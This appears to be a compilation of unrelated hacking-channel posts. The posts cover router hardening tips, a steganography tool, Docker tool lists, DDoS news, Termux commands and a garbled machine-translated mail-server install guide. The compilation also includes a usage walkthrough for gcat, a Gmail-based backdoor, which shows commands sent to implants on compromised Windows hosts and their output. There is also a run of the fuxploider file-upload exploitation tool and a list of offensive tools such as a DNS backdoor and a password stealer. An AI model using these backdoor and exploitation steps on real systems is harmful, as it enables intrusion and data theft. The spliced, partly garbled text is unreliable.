🦑 How to protect against router DNS control?

1) Change the initial password and set the password to be more complicated;

2) Real-time upgrade router firmware patch to repair bare flaws;

3) Initialize the router completely, after clearing the previous settings and equipment, change the password and upgrade the firmware of the router, etc.;

4) Device security software monitors network security


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 few days- Hide secrets with invisible characters in plain text securely using passwords

🦑 Features :

1)Protect your invisible secret using passwords and HMAC integrity

2)Cryptographically secure by encrypting the invisible secret using AES-256-CTR.

3) Uses 6 Invisible characters in unicode characters that works everywhere in the web.

4) Including the most important ones Tweets, Gmail, Whatsapp, Telegram, Instagram, Facebook etc.

5) Maximum Compression to reduce the payload (LZ, Huffman).

6) Completely invisible, uses Zero Width Characters instead of white spaces or tabs.

7) Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.

8) Hiding files in strings can be achieved by uploading the file to cloud and stegcloaking the link in the string

9) Written in pure functional style.
>Available as an API module, a CLI and also a Web Interface (optimized with web workers).

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/KuroLabs/stegcloak.git

2) $ npm install -g stegcloak

Using npm (to use it locally in your program),

3) $ npm install stegcloak

4) for hide Hide

$ stegcloak hide

5) Reveal
$ stegcloak reveal

🦑API Usage
const StegCloak = require('stegcloak');

const stegcloak = new StegCloak(true, false); // Initializes with encryption true and hmac false for hiding

// These arguments are used only during hide

// Can be changed later by switching boolean flags for stegcloak.encrypt and stegcloak.integrity

✅Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Monitoring 2020

- [Logspout](https://github.com/gliderlabs/logspout) - Log routing for Docker container logs by [@gliderlabs][gliderlabs]

- [Out-of-the-box Host/Container Monitoring/Logging/Alerting Stack](https://github.com/uschtwill/docker_monitoring_logging_alerting) - Docker host and container monitoring, logging and alerting out of the box using cAdvisor, Prometheus, Grafana for monitoring, Elasticsearch, Kibana and Logstash for logging and elastalert and Alertmanager for alerting. Set up in 5 Minutes. Secure mode for production use with built-in [Automated Nginx Reverse Proxy (jwilder's)][nginxproxy].

- [Zabbix Docker module](https://github.com/monitoringartist/Zabbix-Docker-Monitoring) - Zabbix module that provides discovery of running containers, CPU/memory/blk IO/net container metrics. Systemd Docker and LXC execution driver is also supported. It's a dynamically linked shared object library, so its performance is (~10x) better, than any script solution.

- [Zabbix Docker](https://github.com/gomex/docker-zabbix) - Monitor containers automatically using zabbix LLD feature.


✅Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 dockers for #Developers :

- CaptainDuckDuck - Open source Heroku-like platform with a one-liner installer and a GUI for managing apps - with serveral one-click databases and apps.

- Convox Rack - Convox Rack is open source PaaS built on top of expert infrastructure automation and devops best practices.

- Dcw - Docker-compose SSH wrapper: a very poor man PaaS, exposing the docker-compose and custom-container commands defined in container labels.

- Dokkudokku - Docker powered mini-Heroku that helps you build and manage the lifecycle of applications (originally by @progriumprogrium)

- Empire - A PaaS built on top of Amazon EC2 Container Service (ECS)

- Flynn - A next generation open source platform as a service

- OpenShiftopenshift - An open source PaaS built on Kuberneteskubernetes and optimized for Dockerized app development and deployment by Red Hat

- Tsuru - Tsuru is an extensible and open source Platform as a Service software

- Workflow - The open source PaaS for Kubernetes by Deis. Formerly Deis v1.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Popular 2020 Hacking #Dockers :

- DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices

- Andor - Blind SQL Injection Tool With Golang

- SQL Injection Payload List

- WinPwn - Automation For Internal Windows Penetrationtest / AD-Security

- Ddoor - Cross Platform Backdoor Using Dns Txt Records

- Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests

- SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command

- Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos

- FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation

- DNCI - Dot Net Code Injector

- RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking

- Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets

- Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems

- Sshtunnel - SSH Tunnels To Remote Server

- RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components

- Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit

- Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare

- Corsy - CORS Misconfiguration Scanner

- Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution

- XML External Entity (XXE) Injection Payload List

✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Mobile Device Security 2020 RESOURCES FOR BEGINERS :

The following are several of the resources covered in the Art of Hacking Series LiveLessons, Safari Live Training, and penetration testing books authored by Omar Santos.


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Amazon Cloud Service blocked a 2.3 Tbps DDoS attack in mid-February :

1️⃣Amazon said that its AWS Shield firewall blocked the most intense distributed denial of service (DDoS) attack to date in mid-February this year. The company disclosed in the recently published "AWS Shield Threat Landscape" report. Compared with the peak of 1.7 Tbps recorded in March 2018, the scale of this attack reached a record 2.3 Tbps.

2️⃣Although the name of the customer was not mentioned, Amazon revealed that the attack used the hijacked CLDAP web server, and employees of the company's AWS Shield department spent three days responding to the escalation of the threat.

3️⃣The good news is that thanks to the joint efforts of Internet Service Providers (ISPs), Content Delivery Networks (CDNs), and other Internet infrastructure companies, the current large-scale DDoS attacks have become quite rare.

4️⃣Link 11 pointed out in its first quarter 2020 report that the maximum DDoS attack traffic it mitigated was 406 Gbps. If we take the average, the single DDoS attack in the first quarter of this year is only about 5 Gbps.

5️⃣During the same period, the peak of DDoS attacks handled by Cloudflare exceeded 550 Gbps. Akamai announced this morning that the DDoS attack in the first week of June 2020 blocked only 1.44 Tbps of traffic.

6️⃣CLDAP is called "connectionless lightweight directory access protocol". As an alternative to the earlier LDAP protocol, it is mainly used to connect, search and modify shared directories on the Internet.

@UndercodeNews
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A stealthy Python based backdoor that uses Gmail as a command and control server
Termux-Linux

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣ git clone https://github.com/byt3bl33d3r/gcat.git

2️⃣cd gcat

3️⃣Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

#~ python gcat.py -list

> 964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on

4️⃣Let's issue a command to an implant:

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
* Command sent successfully with jobid: SH3C4gv

5️⃣Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
✅git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Tips for Text Manipulation

#grep Commands Cheatsheets
- Ryan's Tutorials Cheat Sheet

- DevNotes cheatsheet

#Regex

- grep + regex cheatsheet

- nixCraft Tutorial

#Converters

- BigBash - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux tips/commands :

pip install youtube-dl For installing Youtube-dl

Packages install python Installs Python

termux-setup-storage Gives TERMUX access to your file system

mkdir ‘dir-name For creating directory

cd “dir-name” For changing directory

cat “file-name” For reading any file

mv /path/file /path where file is moved For moving files from one path
to another.

cp /path/file /path where to copy file For copying files from one path
to other

rm filename.file-extension For removing mentioned file from a certain directory.

ping “website URL” Helps verify IP level connectivity

toilet -f mono12 -F gay “your text” Presents text in a specified format.

apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.

apt show (app-name) Installs the desired app

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

New pro courses

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑updated 2020 File upload vulnerability scanner and exploitation tool :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/almandin/fuxploider.git

2️⃣cd fuxploider

3️⃣pip3 install -r requirements.txt
If you have problems with pip (and if you use windows apparently) :

3️⃣python3 -m pip install -r requirements.txt
For Docker installation

4️⃣# Build the docker image
docker build -t almandin/fuxploider

5️⃣python3 fuxploider.py -h

6️⃣Example run :
python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"

✅Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Pro Users :
FreeMail standalone version installation guide


1️⃣Install the operating system on the server (recommended Freebsd 4.X), configure the network, DNS server
<Recommendation: When installing Freebsd, set the server to boot from the CD, and then use the Freebsd4.1 installation CD provided by us to start, enter directly The installation interface of the system can save the trouble of making an installation floppy disk.
After booting, select Skip kernel configure standardEntire hard diskInstall BootMgr partition (swp:500M, root: rest)Install from CD-ROM>

2️⃣Considering that some background submission functions of the management interface are invoked in shell mode, the system default SHELL adopts /bin/sh or /bin/bash
<Note: After successfully using the installation CD provided by us, the system adopts /bin/bash> by default

3️⃣Prepare two directories:
/usr/mail /usr/disk The owner is nobody
chown nobody /usr/mail; chown nobody /usr/disk>

4️⃣Use freemail.tar.gz
<Note: This compressed package includes all packages of Freemail:
apache_1.3.12
ldap
mysql_3.23.13a
qmail_1.03
imap
run the following command:
gunzip freemail.tar.gz
tar xvf freemail.tar compressed package automatically Release to the directory /usr/install/FREEMAIL.>

5️⃣．There are several configuration files under /usr/install/FREEMAIL/CONF: ------These files cannot be deleted during installation
-rw-r--r-- 1 root wheel 6 Sep 6 15:08 .quote - ----- Prompt system mailbox capacity
<Note: This file is used to set the size of the user's email mailbox, the initial setting is 10240K>
-rw-r--r-- 1 root wheel 194 Sep 6 14:36 ​​freemail. conf -----
freemail system configuration information _HOSTNAME=test.soim.com; -----------------Modify this item to the corresponding domain name.
_SMTPSERVER=127.0.0.1;
_WWWHOST=http://10.1.1.217;
_LDAPHOST=ldap://10.1.1.217;
_HOMEPAGE=http://10.1.1.217; -------------- The above three items are modified to the corresponding IP address _IP
=localhost;
_PASSWORD=coffee&tea;
_DEFAULTLANG=GB2312;
--------------------Note: The red font cannot be changed
-rw -r - r-- 1 root wheel 0 Sep 5 18:24 ip_domain.conf ------ virtual domain for use if there is no virtual domains, null
representation if the client login, just enter your account name without the domain name suffix, under the premise of the presence of a virtual domain name system, defaults are determined by ip_domain.conf
this document says: in virtual domain name system support, at the right time when the user uses the system SMTP / POP3 / IMAP functions, not On the premise of entering the domain name, how to determine the domain in which the user resolves.
Such as:
10.1.1.21 : local.freemail.com

-rw-r--r-- 1 root wheel 11 Sep 6 14:36 ​​servers.ip
The IP address of the server in the FREEMAIL system. For the stand-alone version, only this Machine IP, such as:
10.1.1.217 -------------This item is modified to the corresponding IP address

-rw-r--r-- 1 root wheel 65 Sep 5 17:28 system.conf----- ----- System control information
long _MAXUSERS=200000;
char _SINGLE=``''T''''; //Is it a stand-alone system?
int _MAXHOST=10;
char _ENCRYPT='T'; //Whether the user password encryption?

-rw-r--r-- 1 root wheel 0 Sep 6 15:10 system.disk--------- Disk information in the system (usually empty)

-rw-r--r-- 1 root wheel 67 Sep 6 14:41 tcp.smtp --------- tcpserver configuration information
127.0.0.1:allow,RELAYCLIENT= "" ""
10.1.1: the allow, RELAYCLIENT = "" ""
: the you allow

- rw-r--r-- 1 root wheel 20 Sep 6 10:47 webmail.conf ------APACHE path information
/usr/apache/htdocs/ ---------cannot be changed
<Explanation: APACHE is installed in the /usr/apache directory by default in the installation program we provide, so this setting cannot be modified, otherwise, the page cannot be browsed correctly>